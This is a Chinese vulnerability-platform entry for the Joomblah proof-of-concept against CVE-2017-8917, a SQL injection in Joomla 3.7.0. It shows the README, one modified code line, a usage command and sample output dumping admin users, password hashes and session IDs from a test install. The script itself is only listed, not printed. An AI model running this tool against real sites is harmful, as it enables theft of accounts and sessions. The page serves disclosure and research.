漏洞平台

POC详情： 6a14fe627dcc74a8473a146c936fb4563deb654c

来源

https://github.com/gloliveira1701/Joomblah

关联漏洞

标题： Joomla! SQL注入漏洞 (CVE-2017-8917)
描述：Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。 Joomla! 3.7.1之前的3.7.x版本中存在SQL注入漏洞。远程攻击者可利用该漏洞执行任意SQL命令。

描述

CVE-2017-8917 SQL injection Vulnerability in Joomla! 3.7.0 exploit

介绍

# Joomblah
Exploit for Joomla 3.7.0 (CVE-2017-8917)

Explanation about the vulnerability:

https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html 

## Code modification
Modification in line 46

```python
...
 result += value.decode('utf-8')
...
```

## Usage
Point the joomblah.py script at the vulnerable Joomla 3.7.0 install, it may take some time, but it will dump the users and session tables.

```
$ python joomblah.py http://127.0.0.1:8080
                                                                                                                    
    .---.    .-'''-.        .-'''-.                                                           
    |   |   '   _    \     '   _    \                            .---.                        
    '---' /   /` '.   \  /   /` '.   \  __  __   ___   /|        |   |            .           
    .---..   |     \  ' .   |     \  ' |  |/  `.'   `. ||        |   |          .'|           
    |   ||   '      |  '|   '      |  '|   .-.  .-.   '||        |   |         <  |           
    |   |\    \     / / \    \     / / |  |  |  |  |  |||  __    |   |    __    | |           
    |   | `.   ` ..' /   `.   ` ..' /  |  |  |  |  |  |||/'__ '. |   | .:--.'.  | | .'''-.    
    |   |    '-...-'`       '-...-'`   |  |  |  |  |  ||:/`  '. '|   |/ |   \ | | |/.'''. \   
    |   |                              |  |  |  |  |  |||     | ||   |`" __ | | |  /    | |   
    |   |                              |__|  |__|  |__|||\    / '|   | .'.''| | | |     | |   
 __.'   '                                              |/'..' / '---'/ /   | |_| |     | |   
|      '                                               '  `'-'`       \ \._,\ '/| '.    | '.  
|____.'                                                                `--'  `" '---'   '---' 

 [-] Fetching CSRF token
 [-] Testing SQLi
  -  Found table: rlbre_users
  -  Found table: tgukl_users
  -  Extracting users from rlbre_users
 [$] Found user ['361', 'Super User', 'admin', 'admin@example.com', '$2y$10$G4ivaKw71R4uIvuHYliSke5pHoh1Q.xm.Sk29d8zpzx4xJBfPoyEK', '', '']
  -  Extracting sessions from rlbre_session
 [$] Found session ['361', '3rfv8kql26s6kvimpbchneom85', 'admin']
  -  Extracting users from tgukl_users
 [$] Found user ['883', 'Super User', 'admin', 'admin@example.com', '$2y$10$5Za2zpqTdRo5x19cvO5biOKeiyOi2iTQ3u0SSLtcs6uvIvJhvM9aG', '', '']
  -  Extracting sessions from tgukl_session
```
## Licence
Licenced under the [WTFPL](http://www.wtfpl.net/)
Credits Original code by @XiphosResearch

文件快照

 [4.0K]  /data/pocs/6a14fe627dcc74a8473a146c936fb4563deb654c
├── [7.3K]  joomblah.py
└── [2.5K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。